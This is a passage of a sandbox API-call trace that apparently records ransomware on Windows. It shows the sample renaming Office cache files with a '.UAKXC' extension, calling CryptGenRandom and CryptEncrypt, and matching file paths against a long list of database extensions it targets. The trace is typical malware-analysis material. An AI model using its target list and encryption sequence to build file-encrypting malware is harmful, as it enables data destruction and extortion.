Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.UAKXC" [0159.556] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.uakxc")) returned 1 [0159.556] GetProcessHeap () returned 0xea0000 [0159.556] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77950d0 | out: hHeap=0xea0000) returned 1 [0159.557] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6148 | out: hHeap=0xea0000) returned 1 [0159.557] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d08 | out: hHeap=0xea0000) returned 1 [0159.557] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0159.557] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0159.557] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0159.557] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0159.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0159.558] GetLastError () returned 0x0 [0159.558] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1852) returned 1 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0159.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0159.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0159.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0159.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0159.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0159.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All 